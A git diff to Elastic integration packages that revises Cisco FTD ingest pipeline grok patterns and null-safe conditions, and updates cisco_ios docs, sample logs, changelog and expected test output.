"\\b(?:[0-9A-Za-z][0-9A-Za-z_-]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z_-]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" NOTCOLON: "[^:]*" ECSSOURCEIPORHOST: "(?:%{IP:source.address}|%{HOSTNAME:source.domain})" @@ -935,15 +935,15 @@ processors: if: '["302014", "302016", "302018", "302021", "302036", "302304", "302306"].contains(ctx._temp_.cisco.message_id)' description: "302014, 302016, 302018, 302021, 302036, 302304, 302306" patterns: - - ^Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.source_username}\)? )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? )?duration (?:%{DURATION:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) %{NOTCOLON:event.reason} from %{NOTCOLON:_temp_.cisco.termination_initiator} \(%{CISCO_USER:_temp_.cisco.termination_user}\) - - ^Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.source_username}\)? )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? )?duration (?:%{DURATION:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) %{NOTCOLON:event.reason} from %{NOTCOLON:_temp_.cisco.termination_initiator} - - ^Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.source_username}\)? )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? )?duration (?:%{DURATION:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) %{NOTCOLON:event.reason} \(%{CISCO_USER:_temp_.cisco.termination_user}\) - - ^Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.source_username}\)? )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? )?duration (?:%{DURATION:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) \(%{CISCO_USER:_temp_.cisco.termination_user}\) - - ^Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.source_username}\)? )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? )?duration (?:%{DURATION:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) %{NOTCOLON:event.reason} - - ^Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.source_username}\)? )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? )?duration (?:%{DURATION:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) - - ^Teardown %{NOTSPACE:network.transport} connection for faddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSDESTIPORHOST}/%{NUMBER}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? )?gaddr (?:%{NOTCOLON}:)?%{MAPPEDSRC}/%{NUMBER} laddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSSOURCEIPORHOST}/%{NUMBER}\s*(?:\(%{CISCO_USER:_temp_.cisco.source_username}\))?(\s*type %{NUMBER:_temp_.cisco.icmp_type} code %{NUMBER:_temp_.cisco.icmp_code})? + - ^Teardown (?:Probe )?%{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.source_username}\)? )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? )?duration (?:%{DURATION:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) %{NOTCOLON:event.reason} from %{NOTCOLON:_temp_.cisco.termination_initiator} \(%{CISCO_USER:_temp_.cisco.termination_user}\) + - ^Teardown (?:Probe )?%{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.source_username}\)? )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? )?duration (?:%{DURATION:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) %{NOTCOLON:event.reason} from %{NOTCOLON:_temp_.cisco.termination_initiator} + - ^Teardown (?:Probe )?%{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.source_username}\)? )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? )?duration (?:%{DURATION:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) %{NOTCOLON:event.reason} \(%{CISCO_USER:_temp_.cisco.termination_user}\) + - ^Teardown (?:Probe )?%{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.source_username}\)? )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? )?duration (?:%{DURATION:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) \(%{CISCO_USER:_temp_.cisco.termination_user}\) + - ^Teardown (?:Probe )?%{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.source_username}\)? )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? )?duration (?:%{DURATION:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) %{NOTCOLON:event.reason} + - ^Teardown (?:Probe )?%{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.source_username}\)? )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? )?duration (?:%{DURATION:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) + - ^Teardown (?:Probe )?%{NOTSPACE:network.transport} connection for faddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSDESTIPORHOST}/%{NUMBER}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? )?gaddr (?:%{NOTCOLON}:)?%{MAPPEDSRC}/%{NUMBER} laddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSSOURCEIPORHOST}/%{NUMBER}\s*(?:\(%{CISCO_USER:_temp_.cisco.source_username}\))?(\s*type %{NUMBER:_temp_.cisco.icmp_type} code %{NUMBER:_temp_.cisco.icmp_code})? pattern_definitions: - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z_-]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z_-]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" NOTCOLON: "[^:]*" ECSSOURCEIPORHOST: "(?:%{IP:source.address}|%{HOSTNAME:source.domain})" @@ -1331,7 +1331,7 @@ processors: lang: painless source: | boolean isEmpty(def value) { - return (value instanceof AbstractList? value.size() : value.length()) == 0; + return (value instanceof AbstractList ? value.size() : value.length()) == 0; } def appendOrCreate(Map dest, String[] path, def value) { for (int i=0; i long parse_hms(String s) { long cur = 0, total = 0; @@ -1670,7 +1674,7 @@ processors: } return total + cur; } - if (ctx?.event == null) { + if (ctx.event == null) { ctx['event'] = new HashMap(); } String end = ctx['@timestamp']; @@ -1685,7 +1689,7 @@ processors: # - grok: field: "_temp_.cisco.source_username" - if: 'ctx?._temp_?.cisco?.source_username != null' + if: 'ctx._temp_?.cisco?.source_username != null' ignore_failure: true patterns: - '%{CISCO_DOMAIN_USER:_temp_.cisco.source_username}%{CISCO_SGT}' @@ -1700,7 +1704,7 @@ processors: ignore_missing: true - grok: field: "_temp_.cisco.destination_username" - if: 'ctx?._temp_?.cisco?.destination_username != null' + if: 'ctx._temp_?.cisco?.destination_username != null' ignore_failure: true patterns: - '%{CISCO_DOMAIN_USER:_temp_.cisco.destination_username}%{CISCO_SGT}' @@ -1716,11 +1720,11 @@ processors: - set: field: source.user.name value: "{{{ _temp_.cisco.source_username }}}" - if: 'ctx?.source?.user?.name == null && ctx?._temp_?.cisco?.source_username != null' + if: 'ctx.source?.user?.name == null && ctx._temp_?.cisco?.source_username != null' - set: field: destination.user.name value: "{{{ _temp_.cisco.destination_username }}}" - if: 'ctx?.destination?.user?.name == null && ctx?._temp_?.cisco?.destination_username != null' + if: 'ctx.destination?.user?.name == null && ctx._temp_?.cisco?.destination_username != null' # Support masked user value - grok: field: "source.user.name" @@ -1744,7 +1748,7 @@ processors: - grok: field: "destination.user.name" tag: "grok_destination_user_name" - if: 'ctx?.destination?.user?.name != null' + if: 'ctx.destination?.user?.name != null' patterns: - (%{CISCO_DOMAIN})?%{CISCO_USER_EMAIL:destination.user.email} - (%{CISCO_DOMAIN})?%{CISCO_USER} @@ -1786,7 +1790,7 @@ processors: # mapping in case network.transport contains the iana_number. # - script: - if: "ctx?.network?.transport != null" + if: "ctx.network?.transport != null" lang: painless params: icmp: 1 @@ -2029,7 +2033,7 @@ processors: - set: field: source.nat.ip value: "{{{_temp_.cisco.mapped_source_ip}}}" - if: "ctx?._temp_?.cisco?.mapped_source_ip != ctx?.source?.ip" + if: "ctx._temp_?.cisco?.mapped_source_ip != ctx.source?.ip" ignore_empty_value: true - convert: field: source.nat.ip @@ -2038,7 +2042,7 @@ processors: - set: field: source.nat.port value: "{{{_temp_.cisco.mapped_source_port}}}" - if: "ctx?._temp_?.cisco?.mapped_source_port != ctx?.source?.port" + if: "ctx._temp_?.cisco?.mapped_source_port != ctx.source?.port" ignore_empty_value: true - convert: field: source.nat.port @@ -2047,7 +2051,7 @@ processors: - set: field: destination.nat.ip value: "{{{_temp_.cisco.mapped_destination_ip}}}" - if: "ctx?._temp_?.cisco.mapped_destination_ip != ctx?.destination?.ip" + if: "ctx._temp_?.cisco.mapped_destination_ip != ctx.destination?.ip" ignore_empty_value: true - convert: field: destination.nat.ip @@ -2056,7 +2060,7 @@ processors: - set: field: destination.nat.port value: "{{{_temp_.cisco.mapped_destination_port}}}" - if: "ctx?._temp_?.cisco?.mapped_destination_port != ctx?.destination?.port" + if: "ctx._temp_?.cisco?.mapped_destination_port != ctx.destination?.port" ignore_empty_value: true - convert: field: destination.nat.port @@ -2072,50 +2076,50 @@ processors: field: network.direction value: inbound if: > - ctx?._temp_?.external_zones != null && - ctx?._temp_?.internal_zones != null && - ctx?.observer?.ingress?.zone != null && - ctx?.observer?.egress?.zone != null && + ctx._temp_?.external_zones != null && + ctx._temp_?.internal_zones != null && + ctx.observer?.ingress?.zone != null && + ctx.observer?.egress?.zone != null && ctx._temp_.external_zones.contains(ctx.observer.ingress.zone) && ctx._temp_.internal_zones.contains(ctx.observer.egress.zone) - set: field: network.direction value: outbound if: > - ctx?._temp_?.external_zones != null && - ctx?._temp_?.internal_zones != null && - ctx?.observer?.ingress?.zone != null && - ctx?.observer?.egress?.zone != null && + ctx._temp_?.external_zones != null && + ctx._temp_?.internal_zones != null && + ctx.observer?.ingress?.zone != null && + ctx.observer?.egress?.zone != null && ctx._temp_.external_zones.contains(ctx.observer.egress.zone) && ctx._temp_.internal_zones.contains(ctx.observer.ingress.zone) - set: field: network.direction value: internal if: > - ctx?._temp_?.external_zones != null && - ctx?._temp_?.internal_zones != null && - ctx?.observer?.ingress?.zone != null && - ctx?.observer?.egress?.zone != null && + ctx._temp_?.external_zones != null && + ctx._temp_?.internal_zones != null && + ctx.observer?.ingress?.zone != null && + ctx.observer?.egress?.zone != null && ctx._temp_.internal_zones.contains(ctx.observer.egress.zone) && ctx._temp_.internal_zones.contains(ctx.observer.ingress.zone) - set: field: network.direction value: external if: > - ctx?._temp_?.external_zones != null && - ctx?._temp_?.internal_zones != null && - ctx?.observer?.ingress?.zone != null && - ctx?.observer?.egress?.zone != null && + ctx._temp_?.external_zones != null && + ctx._temp_?.internal_zones != null && + ctx.observer?.ingress?.zone != null && + ctx.observer?.egress?.zone != null && ctx._temp_.external_zones.contains(ctx.observer.egress.zone) && ctx._temp_.external_zones.contains(ctx.observer.ingress.zone) - set: field: network.direction value: unknown if: > - ctx?._temp_?.external_zones != null && - ctx?._temp_?.internal_zones != null && - ctx?.observer?.egress?.zone != null && - ctx?.observer?.ingress?.zone != null && + ctx._temp_?.external_zones != null && + ctx._temp_?.internal_zones != null && + ctx.observer?.egress?.zone != null && + ctx.observer?.ingress?.zone != null && ( ( !ctx._temp_.external_zones.contains(ctx.observer.egress.zone) && @@ -2127,15 +2131,14 @@ processors: ) ) # - # Network Directionality when zones are not configured. + # Network Directionality when zones are not configured. # # Requires Integration option "private_is_internal" (defaults to True) # - script: description: Calculate network.direction if zones are not configured lang: painless - if: "ctx.tags != null && - ctx.tags.contains('private_is_internal') && + if: "ctx.tags?.contains('private_is_internal') == true && ctx.source?.ip != null && ctx.destination?.ip != null && (ctx._temp_?.external_zones == null || @@ -2153,7 +2156,7 @@ processors: } } try { - if (ctx?.network == null) { + if (ctx.network == null) { Map map = new HashMap(); ctx.put('network', map); } @@ -2178,18 +2181,18 @@ processors: field: _temp_.url_domain value: "{{{url.domain}}}" ignore_failure: true - if: ctx?.url?.domain != null + if: ctx.url?.domain != null - uri_parts: field: url.original ignore_failure: true - if: ctx?.url?.original != null + if: ctx.url?.original != null - append: field: url.domain value: "{{{_temp_.url_domain}}}" ignore_failure: true allow_duplicates: false - if: ctx?._temp_?.url_domain != null + if: ctx._temp_?.url_domain != null # # Populate ECS event.code @@ -2220,28 +2223,28 @@ processors: # Define ECS Host and Device fields from Cisco ISE pxGrid Endpoint Profile data - remove: field: _temp_.host.type - if: "ctx._temp_?.host?.type != null && ctx._temp_.host.type == 'Invalid ID'" - - gsub: + if: "ctx._temp_?.host?.type == 'Invalid ID'" + - gsub: field: _temp_.host.type pattern: "Device" replacement: " " if: "ctx._temp_?.host?.type != null" - - gsub: + - gsub: field: _temp_.host.type pattern: "^.*Macintosh-Workstation" replacement: "Macintosh:Mac" if: "ctx._temp_?.host?.type != null" - - gsub: + - gsub: field: _temp_.host.type pattern: "^.*Microsoft-Workstation" replacement: "Microsoft:Microsoft" if: "ctx._temp_?.host?.type != null" - - gsub: + - gsub: field: _temp_.host.type pattern: "^.*ChromeBook-Workstation" replacement: "ChromeBook:ChromeBook" if: "ctx._temp_?.host?.type != null" - - gsub: + - gsub: field: _temp_.host.type pattern: "(?:Workstation|[-_])" replacement: " " @@ -2255,19 +2258,19 @@ processors: - host.os.full separator: ":" if: "ctx._temp_?.host?.type != null" - - trim: + - trim: field: device.manufacturer if: "ctx.device?.manufacturer != null" - - trim: + - trim: field: device.model.name if: "ctx.device?.model?.name != null" - - trim: + - trim: field: host.type if: "ctx.host?.type != null" - - trim: + - trim: field: host.os.full if: "ctx.host?.os?.full != null" - + # # Copy _temp_.cisco to its final destination, cisco.asa or cisco.ftd. # @@ -2374,13 +2377,13 @@ processors: - connection - start source: >- - if (ctx?.event?.action == null || !params.containsKey(ctx.event.action)) { + if (ctx.event?.action == null || !params.containsKey(ctx.event.action)) { return; } ctx.event.kind = params.get(ctx.event.action).get('kind'); ctx.event.category = params.get(ctx.event.action).get('category').clone(); ctx.event.type = params.get(ctx.event.action).get('type').clone(); - if (ctx?.event?.outcome == null) { + if (ctx.event?.outcome == null) { return; } if (ctx.event.category.contains('network') || ctx.event.category.contains('intrusion_detection')) { @@ -2421,11 +2424,11 @@ processors: # Malware event kind is classified as alert when sha_disposition is "Malware", "Custom Detection" not for other cases. - set: - if: 'ctx?.event?.code == "430005" && ["Malware", "Custom Detection"].contains(ctx.cisco.ftd.security.sha_disposition)' + if: 'ctx.event?.code == "430005" && ["Malware", "Custom Detection"].contains(ctx.cisco.ftd.security.sha_disposition)' field: event.kind value: alert - append: - if: 'ctx?.event?.code == "430005" && !["Malware", "Custom Detection"].contains(ctx.cisco.ftd.security.sha_disposition)' + if: 'ctx.event?.code == "430005" && !["Malware", "Custom Detection"].contains(ctx.cisco.ftd.security.sha_disposition)' field: event.category value: file @@ -2441,7 +2444,7 @@ processors: field: user.name patterns: - "(?:%{DATA}\\\\)?%{GREEDYDATA:user.name}" - if: ctx.user?.name != null && ctx.user?.name.contains('\\') && ["430001", "430002", "430003", "430004", "430005", ""].contains(ctx?.event?.code) + if: ctx.user?.name?.contains('\\') == true && ["430001", "430002", "430003", "430004", "430005", ""].contains(ctx.event?.code) # Set user.name if only destination.user.name is set. - set: @@ -2449,7 +2452,7 @@ processors: field: user.name value: "{{{destination.user.name}}}" ignore_empty_value: true - if: ctx?.user?.name == null + if: ctx.user?.name == null # Remove user field if present and empty - remove: @@ -2463,21 +2466,21 @@ processors: field: rule.name copy_from: cisco.ftd.security_event.access_control_rule_name if: ctx.cisco?.ftd?.security_event?.access_control_rule_name != null - - - set: + + - set: field: rule.ruleset copy_from: cisco.ftd.security_event.ac_policy if: ctx.cisco?.ftd?.security_event?.ac_policy != null - - set: + - set: field: rule.ruleset copy_from: cisco.ftd.security.intrusion_policy - if: ctx.rule?.ruleset == null && ctx.cisco?.ftd?.security?.intrusion_policy != null + if: ctx.rule?.ruleset == null && ctx.cisco?.ftd?.security?.intrusion_policy != null - - set: + - set: field: rule.ruleset copy_from: cisco.ftd.security_event.file_policy - if: ctx.rule?.ruleset == null && ctx.cisco?.ftd?.security_event?.file_policy != null + if: ctx.rule?.ruleset == null && ctx.cisco?.ftd?.security_event?.file_policy != null # Configures observer fields with a copy from cisco and host fields. Later on these might replace host.hostname. - set: @@ -2507,77 +2510,77 @@ processors: - append: field: related.ip value: "{{{source.ip}}}" - if: "ctx?.source?.ip != null" + if: "ctx.source?.ip != null" allow_duplicates: false - append: field: related.ip value: "{{{source.nat.ip}}}" - if: "ctx?.source?.nat?.ip != null" + if: "ctx.source?.nat?.ip != null" allow_duplicates: false - append: field: related.ip value: "{{{destination.ip}}}" - if: "ctx?.destination?.ip != null" + if: "ctx.destination?.ip != null" allow_duplicates: false - append: field: related.ip value: "{{{destination.nat.ip}}}" - if: "ctx?.destination?.nat?.ip != null" + if: "ctx.destination?.nat?.ip != null" allow_duplicates: false - append: field: related.user value: "{{{user.name}}}" - if: ctx?.user?.name != null && ctx?.user?.name != '' + if: ctx.user?.name != null && ctx.user.name != '' allow_duplicates: false - append: field: related.user value: "{{{server.user.name}}}" - if: ctx?.server?.user?.name != null && ctx?.server?.user?.name != '' + if: ctx.server?.user?.name != null && ctx.server.user.name != '' allow_duplicates: false - append: field: related.user value: "{{{source.user.name}}}" - if: ctx?.source?.user?.name != null && ctx?.source?.user?.name != '' + if: ctx.source?.user?.name != null && ctx.source.user.name != '' allow_duplicates: false - append: field: related.user value: "{{{destination.user.name}}}" - if: ctx?.destination?.user?.name != null && ctx?.destination?.user?.name != '' + if: ctx.destination?.user?.name != null && ctx.destination.user.name != '' allow_duplicates: false - append: field: related.hash value: "{{{file.hash.sha256}}}" - if: "ctx?.file?.hash?.sha256 != null" + if: "ctx.file?.hash?.sha256 != null" allow_duplicates: false - append: field: related.hosts value: "{{{host.hostname}}}" - if: ctx.host?.hostname != null && ctx.host?.hostname != '' + if: ctx.host?.hostname != null && ctx.host.hostname != '' allow_duplicates: false - append: field: related.hosts value: "{{{observer.hostname}}}" - if: ctx.observer?.hostname != null && ctx.observer?.hostname != '' + if: ctx.observer?.hostname != null && ctx.observer.hostname != '' allow_duplicates: false - append: field: related.hosts value: "{{{destination.domain}}}" - if: ctx.destination?.domain != null && ctx.destination?.domain != '' + if: ctx.destination?.domain != null && ctx.destination.domain != '' allow_duplicates: false - append: field: related.hosts value: "{{{source.domain}}}" - if: ctx.source?.domain != null && ctx.source?.domain != '' + if: ctx.source?.domain != null && ctx.source.domain != '' allow_duplicates: false - append: field: related.hosts value: "{{{source.user.domain}}}" - if: ctx.source?.user?.domain != null && ctx.source?.user?.domain != '' + if: ctx.source?.user?.domain != null && ctx.source.user.domain != '' allow_duplicates: false - append: field: related.hosts value: "{{{destination.user.domain}}}" - if: ctx.destination?.user?.domain != null && ctx.destination?.user?.domain != '' + if: ctx.destination?.user?.domain != null && ctx.destination.user.domain != '' allow_duplicates: false - script: lang: painless @@ -2601,7 +2604,7 @@ processors: ignore_failure: true - remove: field: event.original - if: "ctx?.tags == null || !(ctx.tags.contains('preserve_original_event'))" + if: "ctx.tags?.contains('preserve_original_event') != true" ignore_failure: true ignore_missing: true on_failure: diff --git a/packages/cisco_ftd/manifest.yml b/packages/cisco_ftd/manifest.yml index e441f6b446d..db78efdd4db 100644 --- a/packages/cisco_ftd/manifest.yml +++ b/packages/cisco_ftd/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: cisco_ftd title: Cisco FTD -version: "3.1.1" +version: "3.2.4" description: Collect logs from Cisco FTD with Elastic Agent. type: integration categories: diff --git a/packages/cisco_ios/_dev/build/docs/README.md b/packages/cisco_ios/_dev/build/docs/README.md index 70f52261b53..db8c146bd16 100644 --- a/packages/cisco_ios/_dev/build/docs/README.md +++ b/packages/cisco_ios/_dev/build/docs/README.md @@ -15,6 +15,7 @@ The format of timezones added to Cisco IOS logs does not always match the expect 2. `Timezone Map` - This option is for users who have logs from multiple timezones and want to translate them to the correct timezone. This option allows the user to specify a map of timezones to translate from and to. This option is recommended for advanced users who have logs from multiple timezones being sent to the same integration instance. If the timezone in a Cisco IOS log entry does not match any of the configured mappings, the log will fall back to the timezone specified in the `Timezone` option, and also defaults to `UTC`. +If log messages are relayed resulting in additional syslog header prefixes or other text, this text must be removed for ingestion to be successful. This may be done by adding an appropriate Beats processor to the configuration. ### IOS diff --git a/packages/cisco_ios/_dev/deploy/docker/sample_logs/cisco-ios-timezones.log b/packages/cisco_ios/_dev/deploy/docker/sample_logs/cisco-ios-timezones.log index dcdf4bbb9cf..b81a9774b6d 100644 --- a/packages/cisco_ios/_dev/deploy/docker/sample_logs/cisco-ios-timezones.log +++ b/packages/cisco_ios/_dev/deploy/docker/sample_logs/cisco-ios-timezones.log @@ -15,4 +15,4 @@ <190>2361044: sw01: Jan 16 22:11:43.398: %FOO-6-BAR: Test date format. <190>2361044: sw01: Jan 16 22:11:43 UTC: %FOO-6-BAR: Test date format. <190>2361044: sw01: Jan 16 22:11:43: %FOO-6-BAR: Test date format. -<190>2361044: sw01: Jan 16 22:11:43 EDT: %FOO-6-BAR: Test date format. \ No newline at end of file +<190>2361044: sw01: Jan 16 22:11:43 EDT: %FOO-6-BAR: Test date format. diff --git a/packages/cisco_ios/_dev/deploy/docker/sample_logs/cisco-ios.log b/packages/cisco_ios/_dev/deploy/docker/sample_logs/cisco-ios.log index b92481480a8..91932b10fd2 100644 --- a/packages/cisco_ios/_dev/deploy/docker/sample_logs/cisco-ios.log +++ b/packages/cisco_ios/_dev/deploy/docker/sample_logs/cisco-ios.log @@ -14,4 +14,4 @@ Jun 20 02:43:30 192.168.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: <189>2360957: Jan 6 2022 20:52:12.861: %SYS-5-CONFIG_I: Configured from console by akroh on vty0 (10.100.11.10) <189>: Jan 6 2022 20:54:26.961: %SYS-5-CONFIG_I: Configured from console by akroh on vty0 (10.100.11.10) <190>: Jan 6 2022 20:55:50.671: %SEC-6-IPACCESSLOGDP: list 100 denied icmp 172.16.0.26 -> 10.100.8.34 (3/3), 20 packets -<189>: sw01: Jan 6 2022 21:01:34.964: %SYS-5-CONFIG_I: Configured from console by akroh on vty0 (10.100.11.10) \ No newline at end of file +<189>: sw01: Jan 6 2022 21:01:34.964: %SYS-5-CONFIG_I: Configured from console by akroh on vty0 (10.100.11.10) diff --git a/packages/cisco_ios/changelog.yml b/packages/cisco_ios/changelog.yml index ac368a8fb9f..8e0c77b83cf 100644 --- a/packages/cisco_ios/changelog.yml +++ b/packages/cisco_ios/changelog.yml @@ -1,4 +1,49 @@ # newer versions go on top +- version: "1.26.5" + changes: + - description: Fix ingest pipeline warnings + type: bugfix + link: https://github.com/elastic/integrations/pulls/9566 +- version: "1.26.4" + changes: + - description: Fix hostname parsing for names that contain '_' underscore characters. + type: enhancement + link: https://github.com/elastic/integrations/pull/9481 +- version: "1.26.3" + changes: + - description: Fix bad auth grok processor handling of missing MD5 sums. + type: enhancement + link: https://github.com/elastic/integrations/pull/9443 +- version: "1.26.2" + changes: + - description: Fix handling of timezone configurations. + type: bugfix + link: https://github.com/elastic/integrations/pull/9442 +- version: "1.26.1" + changes: + - description: Improve grok processors to better handle generic messages. + type: enhancement + link: https://github.com/elastic/integrations/pull/9102 +- version: "1.26.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 +- version: "1.25.1" + changes: + - description: Remove erroneous period from repeated messages grok + type: bugfix + link: https://github.com/elastic/integrations/pull/9228 +- version: "1.25.0" + changes: + - description: Add support for repeated messages logs + type: enhancement + link: https://github.com/elastic/integrations/pull/9001 +- version: "1.24.2" + changes: + - description: Fix time zone configuration not being applied. + type: bugfix + link: https://github.com/elastic/integrations/pull/9000 - version: "1.24.1" changes: - description: Changed owners diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-asr920.log-expected.json b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-asr920.log-expected.json index 27af0383851..ca666c5240e 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-asr920.log-expected.json +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-asr920.log-expected.json @@ -284,7 +284,7 @@ ] }, { - "@timestamp": "2023-08-03T08:11:02.204Z", + "@timestamp": "2024-08-03T08:11:02.204Z", "cisco": { "ios": { "facility": "LINEPROTO", @@ -326,7 +326,7 @@ ] }, { - "@timestamp": "2023-08-03T08:08:47.142Z", + "@timestamp": "2024-08-03T08:08:47.142Z", "cisco": { "ios": { "access_list": "ACL_CE-SECURITY", @@ -405,7 +405,7 @@ ] }, { - "@timestamp": "2023-08-03T08:04:47.140Z", + "@timestamp": "2024-08-03T08:04:47.140Z", "cisco": { "ios": { "access_list": "ACL_CE-SECURITY", @@ -488,7 +488,7 @@ ] }, { - "@timestamp": "2023-08-03T08:09:55.769Z", + "@timestamp": "2024-08-03T08:09:55.769Z", "cisco": { "ios": { "facility": "SNMP-SW1", diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-badauth.log b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-badauth.log index 196f50c72d5..a641a04edb3 100644 --- 